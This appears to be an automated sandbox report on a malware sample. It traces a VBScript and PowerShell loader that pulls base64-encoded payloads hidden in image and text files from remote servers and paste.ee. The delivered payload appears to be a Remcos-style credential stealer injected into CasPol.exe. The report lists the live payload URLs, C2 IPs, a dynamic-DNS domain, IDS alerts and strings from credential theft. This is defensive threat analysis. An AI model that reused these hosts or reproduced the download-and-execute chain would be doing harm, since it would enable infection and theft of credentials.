                        Source: Binary string: microsoft.win32.taskscheduleritaskhandlerdnlib.dotnet.writermethodbodydnlib.dotnet.resourcesresourcereaderexceptiondnlib.dotnet.writeritokencreatordnlib.peiimageoptionalheaderdnlib.peimagedatadirectorymicrosoft.win32.taskschedulertaskinstancespolicydnlib.dotnet.mdmdheaderruntimeversiondnlib.dotnet.emitlocallistdnlib.dotnet.emitexceptionhandlerdnlib.dotnet.writercor20headeroptionsdnlib.w32resourceswin32resourcespednlib.dotnet.mdrawdeclsecurityrowmicrosoft.win32.taskschedulericalendartriggermicrosoft.win32.taskschedulertaskeventargsdnlib.dotnet.writerimetadatalistenerdnlib.dotnetimportresolverdnlib.dotnetloggereventdnlib.dotnet.pdbpdbscopednlib.peimageoptionalheader32dnlib.dotnet.mdimetadatadnlib.dotnet.writerimodulewriterlistenerdnlib.dotnet.emitoperandtypednlib.dotnet.writermetadataeventeventfilterdnlib.dotnet.writermetadatadnlib.dotnetpublickeytokendnlib.dotnet.pdbisymbolwriter2dnlib.dotnetassemblydefuserdnlib.dotnetdeclsecurityusermicrosoft.win32.taskschedulerresourcereferencevaluednlib.dotnetassemblynameinfodnlib.dotnetmanifestresourceuserdnlib.dotnetaccesscheckermicrosoft.win32.taskschedulertasksetsecurityoptionsdnlib.dotnet.resourcesresourcewriterdnlib.dotnetmodulekinddnlib.peirvafileoffsetconverterdnlib.dotnetpropertydefusermicrosoft.win32.taskschedulertimetriggerdnlib.dotnetassemblyrefusermicrosoft.win32.taskschedulerwildcarddnlib.dotnetmethodspecmicrosoft.win32.taskschedulertaskeventlogmicrosoft.win32.taskschedulertasksessionstatechangetypednlib.dotnetmethodequalitycomparerdnlib.dotnetcustommarshaltypednlib.dotnetpropertydefmicrosoft.win32.taskscheduleridletriggerdnlib.dotnet.pdbpdbwriterdnlib.dotnettypedefuserdnlib.dotnet.emitstackbehaviourdnlib.dotnet.resourcesbuiltinresourcedatadnlib.dotnettypespecuserdnlib.dotnetfixedsysstringmarshaltypemicrosoft.win32.taskschedulertaskactiontypemicrosoft.win32.taskschedulerrepetitionpattern source: powershell.exe, 0000000A.00000002.1420699141.0000000006DDA000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 0000000A.00000002.1420699141.0000000006DDA000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: microsoft.win32.taskschedulertasklogontypednlib.dotnet.pdb.dsssymbolreadercreator source: powershell.exe, 0000000A.00000002.1420699141.0000000006DDA000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: `5dnlib.dotnetdeclsecuritydnlib.dotnet.writermdtablewriterdnlib.dotnetparamdefuserdnlib.dotnetframeworkredirectdnlib.dotnet.mdguidstreamdnlib.dotnet.writernativemodulewriteroptionsmemorymappedionotsupportedexceptiondnlib.dotnetmemberfindermicrosoft.win32.taskschedulertaskeventwatchermicrosoft.win32.taskschedulermonthsoftheyeardnlib.dotnetgenericinstsigmicrosoft.win32.taskschedulertaskservicednlib.dotnet.pdbsymbolwritercreatordnlib.dotnetihasconstantdnlib.peimagefileheaderdnlib.dotnetmethodsemanticsattributesdnlib.dotnetfileattributesdnlib.dotnetityperesolverdnlib.dotnetimplmapuserdnlib.dotnetmdtokensystem.runtime.compilerservicesextensionattributednlib.dotnet.writerichunkdnlib.dotnetmethodattributesdnlib.dotnet.writeriwritererrordnlib.dotnet.resourcesuserresourcedatadnlib.dotnetnullresolverdnlib.dotnet.writerstringsheapdnlib.dotnet.writerpeheadersdnlib.dotnetimplmapdnlib.dotnet.pdb.dssisymunmanageddocumentwriterdnlib.dotnet.mdheaptypednlib.dotnetidnlibdefdnlib.dotnetcustomattributemicrosoft.win32.taskscheduler.fluentactionbuilderdnlib.dotnet.mdrawmemberrefrowdnlib.utilsmfunc`3dnlib.dotnet.mdrawexportedtyperowdnlib.dotnet.writermethodbodywriterbasednlib.dotnetgenericvardnlib.dotnetimemberrefparentdnlib.dotnetiownermodulednlib.dotnetpropertysigmicrosoft.win32.taskscheduleritriggerdelaydnlib.dotnet.mdrawfieldmarshalrowdnlib.dotnet.emitexceptionhandlertypednlib.dotnet.pdb.managedsymbolreadercreatordnlib.dotnetmoduledefuserdnlib.dotnetgenericparamconstraintuserdnlib.dotnetparamdefdnlib.dotnet.mdrawtypedefrowdnlib.dotnet.resourcescreateresourcedatadelegatednlib.dotnetvtableflagsdnlib.dotnet.mdrawinterfaceimplrowdnlib.dotnet.writeriheapdnlib.dotnet.mdmetadataheaderdnlib.dotnet.mdrawmodulerowdnlib.dotnetimdtokenprovidermddnlib.pervadnlib.dotnet.writermodulewriteroptionsbasednlib.dotnet.pdb.dssisymunmanagedwriter2 source: powershell.exe, 0000000A.00000002.1420699141.0000000006DDA000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 0000000A.00000002.1429145927.0000000008EF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000A.00000002.1403832641.00000000057B5000.00000004.00000800.00020000.00000000.sdmp

                        Spreading

                        barindex
                        Source: Yara matchFile source: C:\Windows\Temp\nonordinary.vbs, type: DROPPED
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_004090DC __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,12_2_004090DC
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0040B6B5 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,12_2_0040B6B5
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0041C7E5 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,12_2_0041C7E5
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0040B8BA FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,12_2_0040B8BA
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0044E989 FindFirstFileExA,12_2_0044E989
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00408CDE __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,12_2_00408CDE
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00419CEE FindFirstFileW,FindNextFileW,FindNextFileW,12_2_00419CEE
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00407EDD __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,12_2_00407EDD
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00406F13 FindFirstFileW,FindNextFileW,12_2_00406F13
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,12_2_100010F1
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_10006580 FindFirstFileExA,12_2_10006580
                        Source: C:\Windows\SysWOW64\recover.exeCode function: 14_2_0040B477 FindFirstFileW,FindNextFileW,14_2_0040B477
                        Source: C:\Windows\SysWOW64\recover.exeCode function: 15_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,15_2_00407EF8
                        Source: C:\Windows\SysWOW64\recover.exeCode function: 16_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,16_2_00407898
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00407357 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,12_2_00407357

                        Software Vulnerabilities

                        barindex
                        Source: C:\Windows\SysWOW64\wscript.exeChild: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

                        Networking

                        barindex
                        Source: Network trafficSuricata IDS: 2047750 - Severity 1 - ET MALWARE Base64 Encoded MZ In Image : 104.168.7.38:80 -> 192.168.2.5:49721
                        Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49723 -> 185.208.156.45:14645
                        Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49724 -> 185.208.156.45:14645
                        Source: Network trafficSuricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 104.168.7.38:80 -> 192.168.2.5:49721
                        Source: Network trafficSuricata IDS: 2020424 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1 : 172.245.191.88:80 -> 192.168.2.5:49722
                        Source: Network trafficSuricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound M2 : 172.245.191.88:80 -> 192.168.2.5:49722
                        Source: Network trafficSuricata IDS: 2057635 - Severity 1 - ET MALWARE Reverse Base64 Encoded MZ Header Payload Inbound : 172.245.191.88:80 -> 192.168.2.5:49722
                        Source: Network trafficSuricata IDS: 2858295 - Severity 1 - ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain) : 172.245.191.88:80 -> 192.168.2.5:49722
                        Source: C:\Windows\SysWOW64\wscript.exeNetwork Connect: 23.186.113.60 443Jump to behavior
                        Source: Malware configuration extractorURLs: qwertyuioplkjhgfdsazxcvbnm.ydns.eu
                        Source: unknownDNS query: name: paste.ee
                        Source: global trafficTCP traffic: 192.168.2.5:49723 -> 185.208.156.45:14645
                        Source: global trafficHTTP traffic detected: GET /xampp/sv/ENCRYPTION01.jpg HTTP/1.1Host: 104.168.7.38Connection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /660/wearereallyniceloverwithgreatthingsonthatkissinggirlonme.txt HTTP/1.1Host: 172.245.191.88Connection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                        Source: Joe Sandbox ViewIP Address: 23.186.113.60 23.186.113.60
                        Source: Joe Sandbox ViewIP Address: 104.168.7.38 104.168.7.38
                        Source: Joe Sandbox ViewIP Address: 172.245.191.88 172.245.191.88
                        Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
                        Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
                        Source: Joe Sandbox ViewASN Name: SIMPLECARRIERCH SIMPLECARRIERCH
                        Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                        Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.5:49725 -> 178.237.33.50:80
                        Source: global trafficHTTP traffic detected: GET /d/h0hNZ9qO/0 HTTP/1.1Accept: */*Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: paste.eeConnection: Keep-Alive
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.38
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.38
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.38
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.38
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.38
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.38
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.38
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.38
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.38
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.38
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.38
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.38
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.38
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.38
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.38
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.38
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.38
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.38
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.38
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.38
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.38
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.38
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.38
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.38
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.38
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.38
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.38
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.38
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.38
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.38
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.38
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.38
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.38
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.38
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.38
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.38
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.38
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.38
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.38
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.38
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.38
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.38
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.38
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.38
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.38
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.38
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.38
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.38
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.38
                        Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.38
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00427321 recv,12_2_00427321
                        Source: global trafficHTTP traffic detected: GET /d/h0hNZ9qO/0 HTTP/1.1Accept: */*Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: paste.eeConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /xampp/sv/ENCRYPTION01.jpg HTTP/1.1Host: 104.168.7.38Connection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /660/wearereallyniceloverwithgreatthingsonthatkissinggirlonme.txt HTTP/1.1Host: 172.245.191.88Connection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                        Source: recover.exe, 0000000E.00000003.1404846311.000000000312A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: .google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
                        Source: recover.exe, 0000000E.00000003.1404846311.000000000312A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: .google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
                        Source: CasPol.exe, 0000000C.00000002.3707861943.00000000037E0000.00000040.10000000.00040000.00000000.sdmp, recover.exe, 0000000E.00000002.1405105210.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: @dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.dathttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
                        Source: CasPol.exe, 0000000C.00000002.3707861943.00000000037E0000.00000040.10000000.00040000.00000000.sdmp, recover.exe, 0000000E.00000002.1405105210.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: @dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.dathttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
                        Source: CasPol.exe, 0000000C.00000002.3708800960.0000000003C00000.00000040.10000000.00040000.00000000.sdmp, recover.exe, 00000010.00000002.1392482413.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
                        Source: CasPol.exe, 0000000C.00000002.3708800960.0000000003C00000.00000040.10000000.00040000.00000000.sdmp, recover.exe, recover.exe, 00000010.00000002.1392482413.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
                        Source: recover.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
                        Source: global trafficDNS traffic detected: DNS query: paste.ee
                        Source: global trafficDNS traffic detected: DNS query: qwertyuioplkjhgfdsazxcvbnm.ydns.eu
                        Source: global trafficDNS traffic detected: DNS query: geoplugin.net
                        Source: powershell.exe, 0000000A.00000002.1399699472.0000000004758000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.168.7.38
                        Source: powershell.exe, 0000000A.00000002.1399699472.0000000004758000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.168.7.38/xampp/sv/ENCRYPTION01.jpg
                        Source: powershell.exe, 0000000A.00000002.1399699472.00000000049C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.245.191.88
                        Source: powershell.exe, 0000000A.00000002.1399699472.00000000049C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.245.191.88/660/wearereallyniceloverwithgreatthingsonthatkissinggirlonme.txt
                        Source: bhv92F0.tmp.14.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                        Source: bhv92F0.tmp.14.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
                        Source: bhv92F0.tmp.14.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
                        Source: bhv92F0.tmp.14.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                        Source: bhv92F0.tmp.14.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                        Source: CasPol.exe, CasPol.exe, 0000000C.00000002.3706884561.0000000000E65000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000000C.00000002.3706537610.0000000000E18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
                        Source: CasPol.exe, 0000000C.00000002.3706884561.0000000000E65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp&
                        Source: powershell.exe, 0000000A.00000002.1403832641.0000000005A28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1403832641.0000000005671000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000C.00000002.3705202126.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                        Source: CasPol.exe, 0000000C.00000002.3706537610.0000000000E18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpTX
                        Source: powershell.exe, 0000000A.00000002.1403832641.0000000005671000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                        Source: bhv92F0.tmp.14.drString found in binary or memory: http://ocsp.digicert.com0
                        Source: powershell.exe, 0000000A.00000002.1399699472.0000000004758000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                        Source: powershell.exe, 0000000A.00000002.1399699472.0000000004601000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: powershell.exe, 0000000A.00000002.1399699472.0000000004758000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                        Source: CasPol.exe, 0000000C.00000002.3708800960.0000000003C00000.00000040.10000000.00040000.00000000.sdmp, recover.exe, recover.exe, 00000010.00000002.1392482413.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
                        Source: CasPol.exe, 0000000C.00000002.3708800960.0000000003C00000.00000040.10000000.00040000.00000000.sdmp, recover.exe, recover.exe, 00000010.00000002.1392482413.0000000000400000.00000040.80000000.00040000.00000000.sdmp, recover.exe, 00000010.00000003.1392343374.00000000036FD000.00000004.00000020.00020000.00000000.sdmp, recover.exe, 00000010.00000003.1392292220.00000000036FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.com
                        Source: recover.exe, 00000010.00000003.1392343374.00000000036FD000.00000004.00000020.00020000.00000000.sdmp, recover.exe, 00000010.00000003.1392292220.00000000036FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.comata
                        Source: CasPol.exe, 0000000C.00000002.3708800960.0000000003C00000.00000040.10000000.00040000.00000000.sdmp, recover.exe, 00000010.00000002.1392482413.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
                        Source: CasPol.exe, 0000000C.00000002.3708800960.0000000003C00000.00000040.10000000.00040000.00000000.sdmp, recover.exe, 00000010.00000002.1392482413.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
                        Source: recover.exe, 0000000E.00000002.1405202666.0000000000BF4000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
                        Source: recover.exe, 00000010.00000002.1392482413.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
                        Source: powershell.exe, 0000000A.00000002.1399699472.0000000004601000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                        Source: wscript.exe, 00000003.00000003.1290712578.00000000031E6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1293393937.00000000031E6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1293649425.00000000031CB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1296343760.00000000053E3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.1297734361.0000000003118000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.1298015541.00000000031CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee
                        Source: wscript.exe, 00000003.00000003.1290712578.00000000031E6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1293393937.00000000031E6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1293649425.00000000031CB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1296343760.00000000053E3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.1297734361.0000000003118000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.1298015541.00000000031CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee;
                        Source: wscript.exe, 00000003.00000003.1290712578.00000000031E6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1293393937.00000000031E6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1293649425.00000000031CB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1296343760.00000000053E3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.1297734361.0000000003118000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.1298015541.00000000031CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com
                        Source: wscript.exe, 00000003.00000003.1290712578.00000000031E6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1293393937.00000000031E6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1293649425.00000000031CB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1296343760.00000000053E3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.1297734361.0000000003118000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.1298015541.00000000031CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com;
                        Source: powershell.exe, 0000000A.00000002.1403832641.0000000005671000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                        Source: powershell.exe, 0000000A.00000002.1403832641.0000000005671000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                        Source: powershell.exe, 0000000A.00000002.1403832641.0000000005671000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                        Source: wscript.exe, 00000003.00000003.1290712578.00000000031E6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1293393937.00000000031E6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1293649425.00000000031CB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1296343760.00000000053E3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.1297734361.0000000003118000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.1298015541.00000000031CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com
                        Source: wscript.exe, 00000003.00000003.1290712578.00000000031E6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1293393937.00000000031E6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1293649425.00000000031CB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1296343760.00000000053E3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.1297734361.0000000003118000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.1298015541.00000000031CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com;
                        Source: powershell.exe, 0000000A.00000002.1399699472.0000000004758000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                        Source: powershell.exe, 0000000A.00000002.1429145927.0000000008EF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000A.00000002.1403832641.00000000057B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/dahall/taskscheduler
                        Source: wscript.exe, 00000003.00000003.1289297265.00000000031F5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1287158709.00000000061E3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1287522743.00000000061FC000.00000004.00000020.00020000.00000000.sdmp, 0[1].txt.3.drString found in binary or memory: https://github.com/koswald/VBScript
